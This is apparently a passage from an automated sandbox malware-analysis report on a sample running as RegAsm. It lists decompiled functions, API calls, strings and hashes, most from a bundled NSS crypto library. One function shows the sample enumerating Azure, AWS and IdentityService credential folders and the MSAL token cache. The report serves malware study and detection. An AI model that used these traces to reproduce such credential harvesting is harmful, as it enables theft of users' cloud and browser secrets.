                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C974CC9
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C974CF4
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C974D0B
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974D5E
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974D68
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C974D85
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C974DA2
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C974DB9
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C974DCF
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                  • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                  • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                                  • Opcode ID: c61100c99077e4a13861151ce212b7b6b0c3d4e7e6da1c2ec9cdb3484a7a0e5e
                                                                                                                                                                                                                                                                  • Instruction ID: b29313a0163978579a1a9ecf57c0cb255b95830f4b265797a5b6713c87902dca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c61100c99077e4a13861151ce212b7b6b0c3d4e7e6da1c2ec9cdb3484a7a0e5e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3941ACB1901142ABDB225F289D406BA3669AF9234CF098134E8154BB03E735E965CFF3
                                                                                                                                                                                                                                                                  Function 00416895 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 135stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041689A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004168BA
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 004168E0
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.azure\), ref: 004168FD
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: _EH_prolog.MSVCRT ref: 004163B8
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 004163D8
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindFirstFileA.KERNEL32(?,?), ref: 004163EF
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,00426908), ref: 0041640C
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416426
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 0041644A
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,0042656D), ref: 0041645B
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 00416478
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: PathMatchSpecA.SHLWAPI(?,?), ref: 0041649F
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 004164CB
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,00426924), ref: 004164DD
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 004164ED
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,00426928), ref: 004164FF
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 00416513
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416938
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00416963
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00416980
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 0041648C
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004169BB
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 004169E6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00416A03
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindNextFileA.KERNEL32(00000000,?), ref: 004166AE
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindClose.KERNEL32(00000000), ref: 004166BD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416A3E
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                  • API String ID: 2836893066-974132213
                                                                                                                                                                                                                                                                  • Opcode ID: 0d978611705abb00938539441a3f18fcd2bd40b860efbec9f212d6582d964748
                                                                                                                                                                                                                                                                  • Instruction ID: 92387e2b9da58526c4cbefbcefef0c94d660bf4633e1de84517b2c519ad480f6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d978611705abb00938539441a3f18fcd2bd40b860efbec9f212d6582d964748
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9841B8B1D40228BADB10EBA0EC46EED777CAF0D304F44456FB555A3182DA7C97888B65
                                                                                                                                                                                                                                                                  Function 6C952D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C952DEC
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C952E00
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C952E2B
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C952E43
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C924F1C,?,-00000001,00000000,?), ref: 6C952E74
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C924F1C,?,-00000001,00000000), ref: 6C952E88
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C952EC6
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C952EE4
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C952EF8
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C952F62
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C952F86
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C952F9E
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C952FCA
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C95301A
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C95302E
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C953066
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C953085
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C9530EC
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C95310C
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C953124
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C95314C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C939180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C96379E,?,6C939568,00000000,?,6C96379E,?,00000001,?), ref: 6C93918D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C939180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C96379E,?,6C939568,00000000,?,6C96379E,?,00000001,?), ref: 6C9391A0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C95316D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3383223490-0
                                                                                                                                                                                                                                                                  • Opcode ID: 64eca545dbff57f17ba150dbe3e48309800e04e895edaa60bd52bb8a42fbeaad
                                                                                                                                                                                                                                                                  • Instruction ID: 81133d26f67a8929b78b11d702dba282b498828d2445226768ead7576b1bbc88
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64eca545dbff57f17ba150dbe3e48309800e04e895edaa60bd52bb8a42fbeaad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83F1CE71E00619EFDF00DF64D844AAABBB8BF09318F448169EC04A7711E735E9A6CB90
                                                                                                                                                                                                                                                                  Function 6C956CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C956943
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C956957
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C956972
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C956983
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C9569AA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C9569BE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C9569D2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C9569DF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C956A5B
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C956D8C
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C956DC5
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956DD6
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956DE7
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C956E1F
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956E4B
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956E72
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956EA7
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956EC4
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956ED5
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C956EE3
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956EF4
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956F08
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C956F35
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956F44
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C956F5B
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C956F65
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C95781D,00000000,6C94BE2C,?,6C956B1D,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C40
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C95781D,?,6C94BE2C,?), ref: 6C956C58
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C6F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C956C84
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C956C96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C956C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C956CAA
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956F90
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956FC5
                                                                                                                                                                                                                                                                  • PK11_GetInternalKeySlot.NSS3 ref: 6C956FF4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1304971872-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7a80de279b4005519dec73cebfe24f1837df0515a14086c0af95a1e6701ce627
                                                                                                                                                                                                                                                                  • Instruction ID: 54d44234bf34edfd341a3962b37d7fd140b33c8ff5335cb449d70aed5bb66da7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a80de279b4005519dec73cebfe24f1837df0515a14086c0af95a1e6701ce627
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91B170B0E022199FEF00CBA5DC44B9EBBB9AF05348F540124E815E7B40E735E979CBA1
                                                                                                                                                                                                                                                                  Function 6C954C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C954C4C
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C954C60
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954CA1
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C954CBE
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954CD2
                                                                                                                                                                                                                                                                  • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954D3A
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954D4F
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954DB7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C954DD7
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C954DEC
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C954E1B
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C954E2F
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954E5A
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C954E71
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C954E7A
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C954EA2
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C954EC1
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C954ED6
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C954F01
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C954F2A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 759471828-0
                                                                                                                                                                                                                                                                  • Opcode ID: 127bff47b6411aa21f313674cc18e68b6857bd8ce125c1586ce99823c37b7cab
                                                                                                                                                                                                                                                                  • Instruction ID: bd971dbf662ea62ddd7b1819fec3713fa6feaa24e2efe5226666a21a08cb00c6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 127bff47b6411aa21f313674cc18e68b6857bd8ce125c1586ce99823c37b7cab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19B11275A002069FDF45EF28D844AAA77B8BF59318F848128ED0597B00E734E976CFE1
                                                                                                                                                                                                                                                                  Function 6C925DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C925DEC
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C925E0F
                                                                                                                                                                                                                                                                  • PORT_ZAlloc_Util.NSS3(00000828), ref: 6C925E35
                                                                                                                                                                                                                                                                  • SECKEY_CopyPublicKey.NSS3(?), ref: 6C925E6A
                                                                                                                                                                                                                                                                  • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C925EC3
                                                                                                                                                                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C925ED9
                                                                                                                                                                                                                                                                  • SECKEY_SignatureLen.NSS3(?), ref: 6C925F09
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C925F49
